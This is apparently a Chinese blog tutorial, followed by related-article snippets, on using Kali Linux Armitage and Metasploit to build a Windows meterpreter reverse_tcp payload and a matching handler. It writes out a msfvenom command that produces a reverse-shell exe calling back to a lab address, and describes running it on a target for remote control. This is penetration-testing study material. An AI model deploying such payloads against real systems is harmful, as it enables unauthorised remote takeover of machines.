程序员经验分享-hwhale

Kali Linux Armitage生成被控端和主控端

2023-11-09

说明

按照《Kali Linux2 网络渗透测试实践指南 第二版 》第八章操作
仅供学习讨论使用,请勿进行非法操作

使用 Armitage生成被控端和主控端

选中“payload”, 然后选择“windows” ➡️“meterpreter”, 找到所需的攻击载荷(即meterpreter_reverse_tcp)来充当被控端。
图中所示的设置为攻击载荷创建了一个主控端,Metasploit也将这个主控端称为handler。但是我们可能要控制多个攻击载荷,所以要将这个handler设置得跟攻击载荷一样。产生攻击载荷的命令如下:
这里LHOST为192.168.229.133,即kali所在主机

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.229.133 LPORT=12076 -f exe -o /root/payload.exe

请添加图片描述

使用相同的步骤,产生一个被控端,这里需要注意,端口也要设置为上面一样的值,否则无法监听到,即12076,“Output”处选择要输出的格式,这里设置为exe,如图所示:
请添加图片描述

单击“Launch”按钮,会产生一个基于meterpreter_reverse_tcp的被控端,并保存我们需要的攻击载荷exe文件。接下来,目标主机上执行这个攻击载荷,就可以使用这个handler来控制目标主机了。
现在将攻击载荷移动到目标主机中,执行攻击载荷后,切回Armitage可以从远程控制目标主机了。如下图所示:
请添加图片描述
请添加图片描述

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

kali linux

Armitage

Kali

Kali Linux Armitage生成被控端和主控端 的相关文章

  • Kali镜像下载

    http old kali org kali images 太全了 爱了爱了 存档

  • 2022年江苏省职业院校技能大赛中职赛项网络信息安全技能试题中职组

    2022年江苏省职业院校技能大赛中职赛项 网络信息安全技能试题中职组 竞赛时间 9 00 12 00 共计3小时 竞赛阶段 拓扑图 竞赛阶段 任务阶段 竞赛任务 竞赛时间 分值 第一阶段单兵模式系统渗透测试 任务一 数据分析数字取证 09

  • Linux上的中文输入法安装(Ubuntu + Kali五笔拼音)

    Linux上的中文输入法安装Ubuntu Kali五笔拼音 1 输入法框架 2 输入法 3 操作系统 4 使用体验 5 安装输入法 6 输入配置 1 输入法框架 在Linux上 常见的输入法框架有三种 fcitx ibus xim 2 输入

  • kali笔记(十四)主机探测

    探测工具 ping ping检查主机是否在线工具 发送ICMP ECHO REQUEST包到目标主机 如果目标主机在线并且不堵塞ping请求 将回复ICMP ECHO REPLY包 ping常用参数 c count ECHO REQUEST

  • Kali 系统基本调试

    目录 前言 实现root登录 方法一 方法二 更新kali系统内核 安装搜狗输入法 安装WPS Firefox 浏览器调优 将 Firefox 浏览器设置为中文 操作如下图 firefox 关闭 success txt 及开启插件安装 更新

  • Kali Linux安装pip2

    问题说明 随着pytho3的强袭崛起 Kali 2020的版本去除了pip2 由于很多之前的黑客工具都是由python2写的 需要通过pip2来安装相应的模块 解决方法 Step 1 下载get pip py wget https boot

  • kali安装中文输入法(本人一遍成功)

    kali中文输入法安装 以下所有操作在你已经换源的情况下完成 首先 安装ibus到系统中 apt get install ibus ibus pinyin 安装中选择是否继续 输入 Y 然后开始下载 下载后 在命令窗口输入reboot重启

  • kali设置中文输入法

    修改国内源 下载输入法包 sudo apt get install ibus ibus pinyin 进入设置 sudo im config 选择ibus 其他选择默认选项 重启

  • Kali Linux Armitage生成被控端和主控端

    目录 说明 使用 Armitage生成被控端和主控端 说明 按照 Kali Linux2 网络渗透测试实践指南 第二版 第八章操作 仅供学习讨论使用 请勿进行非法操作 使用 Armitage生成被控端和主控端 选中 payload 然后选择

  • 2023年kali linux安装中文输入法

    apt get install fcitx 安装输入法框架 apt get install fcitx googlepinyin 安装谷歌输入法 reboot 重启系统 重启之后右上有个小键盘点击里面的配置 添加google输入法 把Goo

  • kali换源出错的问题及解决

    源 leafpad etc apt sources list 中科大 deb http mirrors ustc edu cn kali kali rolling main non free contrib deb src http mir

  • 基于Ha-Joker靶场的完整渗透测试演示直至提权(root)

    信息收集 root kali arp scan l 通过ARP scan进行快速的主机发现 如下图我们猜测10 10 10 138可能是目标主机 root kali nmap sS sV p T4 10 10 10 138 之后通过nmap

  • upload-labs 第四关-第九关闯关方法

    Pass 04 1 打开靶机 点击查看提示 发现这是一个 htaccess绕过 2 写入一个 htaccess的文件 文件内容如下 3 将文件修改为 htaccess的文件 4 上传文件 5 新建一个文本文档 内容如下 6 将文件类型修改为

  • 最新如何在kali linux中安装搜狗输入法

    在安装之前我们先来更新我们的源 更新方法 leafpad etc apt sources list 在打开的文件中输入下面的源 保存退出 阿里云源 deb http mirrors aliyun com kali sana main non

  • Kali Linux 从入门到精通(一)-概论

    Kali Linux 从入门到精通 一 概论 欢迎关注 https github com Wheeeeeeeeels 基本介绍 1 安全目标 先于攻击者发现和防止漏洞出现 攻击型安全 防护型安全 2 渗透测试 尝试挫败安全防御机制 发现系统

  • Kali Linux没有无线网卡?玩个锤纸~

    Kali Linux没有无线网卡 玩个锤纸 一 USB无限网卡 使用Kali linux 先准备好一个适合Kali系统的USB外置无限网卡 注意内置网卡并不适合渗透测试 Linux系统的指令相对于一般人来说比较晦涩难懂 最好选择免驱动类型

  • kali2.0 Metasploit连接postgres数据库

    sudo u postgres createuser demo P 创建用户demo sudo u postgres psql 进入数据库 postgres password demo 设置密码 sudo u postgres create

  • Kali Linux介绍(安装教程)

    一 Kali Linux是什么 Kali Linux是基于Debian的Linux发行版 设计用于数字取证操作系统 每一季度更新一次 由Offensive Security Ltd维护和资助 最先由Offensive Security的Ma

  • dc-8 靶机渗透学习

    信息收集 扫描当前网段 nmap sP 192 168 202 0 24 扫描开放端口 nmap A p v 192 168 202 147 访问靶机的80端口 用Wappalyzer识别框架 随便看看页面 简单对存在的参数进行sql测试

  • 第二章 常用安全工具

    目录 1 Kali系统工具分类 2 Kali Top10工具 1 Kali系统工具分类 信息收集 Information Gathering 主要目的是收集渗透测试目标的基本信息 包括操作系统信息 网络配置信息 应用服务信息等 脆弱性分析

随机推荐

  • MacBook Big Sur 完美解决外接显示器 字体模糊、边缘不清 HIDPI 解决办法

    该文章转发MacBook Big Sur 完美解决外接显示器 字体模糊 边缘不清 HIDPI 解决办法 毕扬博客

  • error: invalid conversion from ‘void*‘ to ‘char*‘ [-fpermissive]

    include

  • 【计算机视觉】InvaSpread 讲解

    任何的书写错误 排版错误 概念错误等 希望大家包含指正 在阅读本篇之前建议先学习 机器学习 噪声对比估计 NCE 计算机视觉 MoCo 讲解 计算机视觉 InstDis 讲解 InvaSpread 在 InvaSpread 中 负样本的个数

  • 点云数据学习总结之一:点云数据存储格式

    最近研究点云数据 找了下相关的资料 看了许多的博文 下面总结了我认为比较写的比较好的博文链接 有需要的可以看下 刚刚才研究 所以可能不全 欢迎大家补充 共同学习 同时 未避免转载的博客链接失效 所以对博客内容进行了截图 如果原博主觉得受到侵

  • RestHighLevelClient封装使用,Java调用ES客户端 [支持ES6.x]

    前言 之前做项目的时候 需要用到Es的操作 本来想使用EsJpa的 即SpringDataElasticsearch 结果项目采用的是SpringBoot1 x版本 不得已 只要自己封装RestHighLevelClient来使用 不过网上

  • 蓝桥杯python技能升级

    只通过了百分之40 后面超时了 给没有头绪的伙计们一个思路吧 也请大佬给一个更好的解题思路 import math n m map int input split max 0 此为加的最大点 当加的次数小于0的时候 return0 if m

  • el-select下拉框只回显value不回显label的原因以及解决方法

    el select的采用的是map的key value结构 因此只显示value而不显示label的原因是 value的类型不正确 只需要在回显之前加上一行代码 将这个value转换成对应的类型即可 我这个里面需要的int类型 因此转成in

  • 集合相似度(PAT)

    题目链接 https www patest cn contests gplt L2 005 一开始用map超时了 总是有一组数据超时 当时觉得很纳闷 后来学到了 其实set也是可以开数组的 map也是 include

  • ubuntu 下安装chrome浏览器

    1 将google chrome stable current amd64软件复制移动到家目录下 2 打开终端 路径在家目录下 3 依次运行下面三条命令 sudo apt get install google chrome stable s

  • Swift的几种传值方式

    传值方式 在进行页面跳转过程中无法避免需要进行值的传递 那么值的传递可以分为正向传值和反向传值 例如在SourceViewController跳转至DestinationViewController的过程中需把前者的属性值传递给后者称为正向

  • 【系列 1】手写vue响应式原理

    手写vue响应式原理 首先我们看看原生 vue 做了什么 可见 vm 第一层与 data 内都能获取到 data 数据 并且其数值都进行了 ge

  • 王道训练营-C语言-1

    1 字符 include

  • 【热门框架】Maven中聚合,继承指的是什么?有什么作用?

    Maven中的聚合和继承是两个重要的功能 用于管理多个项目的共同部分 1 聚合 Maven中的聚合 Aggregation 指的是将多个子项目聚合成一个父项目的过程 聚合的语法如下 xml

  • 数据库初探(1)————关于InnoDB和MyISAM两种数据库存储引擎

    1 mysql中最常见的两种数据库引擎 InnoDB存储引擎 InnoDB存储引擎是Mysql的默认事务引擎 也是最重要 使用最广泛的存储引擎 它被设计用来处理大量的短期事务 短期事务大部分情况下都是可以正常提交的 很少回滚 MyISAM存

  • 【超详解】JavaWeb三大组件讲解

    文章目录 前言 一 Servlet 二 Filter 三 Listener 总结 前言 JavaWeb三大组件指的是 Servlet Filter Listener 三者提供不同的功能 然而很多人可能只用过其中一个或者两个 Servlet

  • 创建React项目

    在开发React项目前最关键的当然是项目的创建 现在的前端工程化使得前端项目的创建也变得越来越复杂 在这里介绍三种从零开始创建React项目的方式 分别是在浏览器中直接引入 使用官方脚手架create react app 使用Webpack

  • 不会盗QQ,还当什么程序员?

    上面这个段子估计很多朋友都看过 程序员被黑过无数次 在其他人眼中 仿佛我们需要写得了木马 翻得了围墙 修得了电脑 找得到资源 但凡是跟计算机沾点边的 咱都得会才行 段子归段子 言归正传 对于咱们程序员来说 多多少少了解一些信息安全的技术知识

  • 打印HashMap的方法分享

    HashMap简介 Hash Map是哈希表基于 Map 接口的实现类 HashMap用于存储数据 允许使用null值和null键 除了非同步和允许使用 null 之外 HashMap 类与 Hashtable 大致相同 HashMap不保

  • 区块链三加一:什么是量化交易

    量化交易是指以先进的数学模型替代人为的主观判断 利用计算机技术从庞大的历史数据中海选能带来超额收益的多种 大概率 事件以制定策略 极大地减少了投资者情绪波动的影响 避免在市场极度狂热或悲观的情况下作出非理性的投资决策 量化交易 有时候也称自

  • Kali Linux Armitage生成被控端和主控端

    目录 说明 使用 Armitage生成被控端和主控端 说明 按照 Kali Linux2 网络渗透测试实践指南 第二版 第八章操作 仅供学习讨论使用 请勿进行非法操作 使用 Armitage生成被控端和主控端 选中 payload 然后选择

热门标签